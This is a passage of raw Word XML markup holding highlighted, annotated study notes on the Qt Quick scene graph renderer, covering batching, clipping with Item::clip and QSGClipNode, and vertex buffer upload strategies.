        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00377C1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidR="00377C1C" w:rsidRPr="00377C1C">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00377C1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Beneath a batch root, one batch is created for each unique set of material state and geometry type.</w:t>
      </w:r>
      <w:r w:rsidR="00377C1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007959FF" w:rsidRPr="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="00377C1C" w:rsidRPr="00377C1C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intbu.</w:t>
      </w:r>
      <w:r w:rsidR="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="007959FF">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1711" w:name="_Toc483000901"/>
      <w:bookmarkStart w:id="1712" w:name="_Toc483003892"/>
      <w:bookmarkStart w:id="1713" w:name="_Toc483604245"/>
      <w:bookmarkStart w:id="1714" w:name="_Toc483605465"/>
      <w:r w:rsidRPr="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Clipping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1711"/>
      <w:bookmarkEnd w:id="1712"/>
      <w:bookmarkEnd w:id="1713"/>
      <w:bookmarkEnd w:id="1714"/>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="002C49E6" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When setting</w:t>
      </w:r>
      <w:r w:rsidR="002C49E6" w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2070" w:anchor="clip-prop" w:history="1">
        <w:r w:rsidRPr="002C49E6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item::clip</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002C49E6" w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to true, it will create a</w:t>
      </w:r>
      <w:r w:rsidR="002C49E6" w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2071" w:history="1">
        <w:r w:rsidRPr="002C49E6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QSGClipNode</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002C49E6" w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with a rectangle in its geometry</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> renderer will apply this clip by </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>using scissoring in OpenGL</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. If the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>item is rotated by a non-90-degree angle</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenGL's stencil buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick Item only supports setting a rectangle as clip through QML, but the scene graph API and the default renderer can use any shape for clipping</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// qml property //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="007959FF" w:rsidRDefault="00815754" w:rsidP="00815754">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC6C9E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404040"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When applying a clip to a subtree, that subtree needs to be rendered with a unique OpenGL state</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6C9E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404040"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6C9E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404040"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This means that when</w:t>
      </w:r>
      <w:r w:rsidR="002C49E6" w:rsidRPr="00BC6C9E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404040"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2072" w:anchor="clip-prop" w:history="1">
        <w:r w:rsidRPr="00BC6C9E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="404040"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item::clip</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002C49E6" w:rsidRPr="00BC6C9E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404040"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6C9E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404040"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is true, batching of that item is limited to </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6C9E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404040"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>its children</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6C9E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404040"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> When there are </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>many children</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, like a</w:t>
      </w:r>
      <w:r w:rsidR="002C49E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2073" w:history="1">
        <w:r w:rsidRPr="00815754">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ListView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="002C49E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidR="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2074" w:history="1">
        <w:r w:rsidRPr="00815754">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>GridView</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, or </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>complex children</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, like a</w:t>
      </w:r>
      <w:r w:rsidR="002C49E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2075" w:history="1">
        <w:r w:rsidRPr="00815754">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>TextArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>this is fine</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>One should, however, use clip on smaller items with caution as it prevents batching</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This includes button label, text field or list delegate and table cells</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="007959FF" w:rsidRPr="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>disadvantage of clipping</w:t>
      </w:r>
      <w:r w:rsidR="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00815754" w:rsidRPr="00815754" w:rsidRDefault="00815754" w:rsidP="0098210B">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1715" w:name="vertex-buffers"/>
      <w:bookmarkStart w:id="1716" w:name="_Toc483000902"/>
      <w:bookmarkStart w:id="1717" w:name="_Toc483003893"/>
      <w:bookmarkStart w:id="1718" w:name="_Toc483604246"/>
      <w:bookmarkStart w:id="1719" w:name="_Toc483605466"/>
      <w:bookmarkEnd w:id="1715"/>
      <w:r w:rsidRPr="007959FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Vertex Buffers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1716"/>
      <w:bookmarkEnd w:id="1717"/>
      <w:bookmarkEnd w:id="1718"/>
      <w:bookmarkEnd w:id="1719"/>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2C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Each batch uses a vertex buffer object (VBO) to store its data on the GPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This vertex buffer </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is retained between frames</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>updated when the part of the scene graph that it represents changes</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</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By </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the renderer will upload data into the VBO using</w:t>
      </w:r>
      <w:r w:rsidR="002C49E6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GL_STATIC_DRAW</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is </w:t>
      </w:r>
      <w:r w:rsidRPr="002C49E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>possible to select different upload strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="00815754">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by setting the environment variable</w:t>
      </w:r>
